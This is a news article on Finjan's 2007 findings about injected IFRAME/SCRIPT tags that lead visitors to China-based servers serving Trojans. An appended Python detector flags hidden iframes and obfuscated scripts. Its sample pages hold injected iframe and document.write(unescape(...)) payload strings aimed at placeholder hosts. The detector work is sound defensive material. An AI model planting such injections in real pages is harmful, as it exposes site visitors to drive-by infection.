
Increased Malicious Activity Coming Out of China

Finjan Inc. has announced findings by its Malicious Code Research Center (MCRC) identifying increased malicious activity originating in China. Finjan examined the attacks and the mechanisms used to execute them and found an intricate network of connections between China-based servers whose main purpose is criminal activity. The entry points that initiate the attack on users "in the wild" exist all over the world, but all of them eventually lead to servers registered under Chinese domains.

The attackers spread the attack by placing its entry points on a variety of websites, located in different regions and classified under different categories by URL categorization engines, so that no single region or category filter catches them. The infection itself is an IFRAME or SCRIPT tag injected into the compromised website, which causes every visitor to the site to be attacked.

Examples of such entry points are shown in the December 2007 Malicious Page of the Month Report; they were found on trusted websites in the USA, China and Western Europe, including government and education sites.

After the victim reaches an entry point, the attackers use dynamic code obfuscation to limit what signature-based technologies can detect, and the victim is redirected through a series of sites containing iframes that eventually force a visit to a site belonging to the Chinese network. In the first stage of the actual attack, the attackers use known as well as new exploits to infect the victim with a crimeware Trojan.

Once the initial Trojan is loaded it downloads further Trojans from different locations. The compromised computer then connects to other sites to report statistical information about the infected PC. Finjan found that different Trojans send encoded information to the same sites (located in China), which it identified as unique to this attack. For more details, including actual examples of these sophisticated attacks based out of China and Central Asia, download the December 2007 Malicious Page of the Month Report from Finjan.

"Signature-based and database-driven technologies like anti-virus and URL filtering are limited against the types of attacks we discovered, as the number of vectors and sophisticated structure of the network of websites can bypass traditional information security technologies," said Finjan CTO Yuval Ben-Itzhak. "Signature-based solutions are finding it hard to deal with the fact that most of the code is obfuscated and changed frequently.

"URL classification-based solutions will find it hard to block an attack that is triggered from legitimate sites, such as government or academic domains. The recommended methodology for handling these modern security threats is to inspect the actual content in real time, regardless of its source, domain name, and the way it looks.

"To prevent these attacks, organizations should add real-time content inspection technology that blocks browsing to one of these infected sites after correctly identifying that it carries malicious code that attempts to exploit a vulnerability."
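The injected IFRAME/SCRIPT entry points and obfuscated redirects described above, and the content-first inspection Ben-Itzhak recommends, as an added example. This is not Finjan's code and does not represent its product; it is a small Python inspector that judges a page by what its markup does rather than by which domain served it. It flags IFRAMEs hidden by zero/tiny size or CSS, SCRIPT blocks that use obfuscation primitives (unescape, String.fromCharCode, eval), and scripts that emit an IFRAME or SCRIPT tag only after one layer of decoding. The HTML pages, the `.test` hostnames and the 2-pixel size threshold are constructed assumptions, not data from the report.

```python
"""Real-time content inspection for the drive-by chain the article describes.

Added example, not Finjan's code. Flags (a) injected IFRAMEs hidden by zero/tiny
size or CSS and (b) SCRIPT blocks that use obfuscation primitives or that, after
one layer of decoding, emit an IFRAME/SCRIPT tag. The HTML samples at the bottom
are constructed; the .test hostnames are placeholders.
"""
import re
from dataclasses import dataclass
from html.parser import HTMLParser
from urllib.parse import unquote

TINY_PX = 2  # assumed threshold: a frame this small is invisible to the visitor
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
OBFUSCATION_CALLS = ("unescape(", "String.fromCharCode(", "eval(")
ESCAPED_STRING = re.compile(r"""unescape\(\s*["']([^"']+)["']\s*\)""", re.I)
CHARCODE_LIST = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")
TAG_AFTER_DECODE = re.compile(r"<\s*(iframe|script)\b", re.I)
SRC_ATTR = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.I)


@dataclass
class Finding:
    tag: str      # "iframe" or "script"
    reason: str   # why the element was flagged
    detail: str   # the URL or snippet behind the finding


def _px(value):
    """Return an integer pixel size for '0', '1px', ' 3 '; None for '100%' or missing."""
    m = re.fullmatch(r"\s*(\d+)(px)?\s*", value or "")
    return int(m.group(1)) if m else None


class _Collector(HTMLParser):
    """Gather IFRAME attribute dicts and SCRIPT (attrs, inline body) pairs."""

    def __init__(self):
        super().__init__()
        self.iframes, self.scripts, self._script = [], [], None

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}   # tag and attr names arrive lowercased
        if tag == "iframe":
            self.iframes.append(attrs)
        elif tag == "script":
            self._script = [attrs, ""]

    def handle_data(self, data):
        if self._script is not None:   # HTMLParser hands script bodies to handle_data
            self._script[1] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            self.scripts.append(tuple(self._script))
            self._script = None


def decode_layer(script):
    """Undo one layer of two common obfuscation forms: unescape("%3C...") becomes the
    percent-decoded text, String.fromCharCode(60,...) becomes the characters.
    (urllib's unquote handles %XX only; JavaScript's unescape also accepts %uXXXX.)"""
    out = ESCAPED_STRING.sub(lambda m: unquote(m.group(1)), script)
    return CHARCODE_LIST.sub(
        lambda m: "".join(chr(int(c)) for c in m.group(1).split(",") if c.strip()), out)


def inspect_html(html):
    """Inspect the page content itself, independent of which domain served it."""
    c = _Collector()
    c.feed(html)
    c.close()
    findings = []
    for a in c.iframes:
        w, h = _px(a.get("width")), _px(a.get("height"))
        if (w is not None and w <= TINY_PX) or (h is not None and h <= TINY_PX):
            findings.append(Finding("iframe", "hidden by zero/tiny size", a.get("src", "")))
        elif HIDDEN_STYLE.search(a.get("style", "")):
            findings.append(Finding("iframe", "hidden by CSS", a.get("src", "")))
    for attrs, body in c.scripts:
        if not body.strip():           # external <script src=...>: body not fetched here
            continue
        hits = [call for call in OBFUSCATION_CALLS if call in body]
        if hits:
            findings.append(Finding("script", "obfuscation primitives " + ", ".join(hits),
                                    body.strip()[:80]))
        decoded = decode_layer(body)
        if decoded != body and TAG_AFTER_DECODE.search(decoded):
            # A tag that exists only after decoding is the document.write(unescape(...)) pattern
            m = SRC_ATTR.search(decoded)
            findings.append(Finding("script", "decoded payload injects a tag",
                                    m.group(1) if m else decoded.strip()[:80]))
    return findings


def is_malicious(html):
    return bool(inspect_html(html))


# Constructed samples: a clean page and the two injection forms from the article.
CLEAN_PAGE = """<html><body><h1>Department news</h1>
<script src="/static/menu.js"></script>
<iframe src="/embed/map" width="600" height="400"></iframe>
</body></html>"""
INJECTED_IFRAME = CLEAN_PAGE.replace(
    "</body>", '<iframe src="http://stat.example.test/in.cgi?3" width="0" height="0"></iframe></body>')
INJECTED_SCRIPT = CLEAN_PAGE.replace(
    "</body>", '<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A//counter.example.test'
               '/c.php%22%20width%3D1%20height%3D1%3E%3C/iframe%3E"))</script></body>')

if __name__ == "__main__":
    for name, page in [("clean", CLEAN_PAGE), ("iframe", INJECTED_IFRAME), ("script", INJECTED_SCRIPT)]:
        print(name, [(f.tag, f.reason, f.detail) for f in inspect_html(page)])
```

The point of `decode_layer` is that the hidden iframe in the third sample never appears literally in the page source, so a signature for `<iframe ... width="0"` misses it; only decoding what the script would write exposes the redirect target. A production inspector would repeat the decoding until it reaches a fixed point, fetch and inspect external script sources, and follow the resulting URL through the redirect chain the article describes.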

Désiré Athow

Désiré has been musing and writing about technology during a career spanning four decades. He dabbled in website building and web hosting when DHTML and frames were en vogue and started writing about the impact of technology on society just before the start of the Y2K hysteria at the turn of the last millennium. Following an eight-year stint at where he discovered the joys of global tech-fests, Désiré now heads up TechRadar Pro. Previously he was a freelance technology journalist at Incisive Media, Breakthrough Publishing and Vnunet, and Business Magazine. He also launched and hosted the first Tech Radio Show on Radio Plus.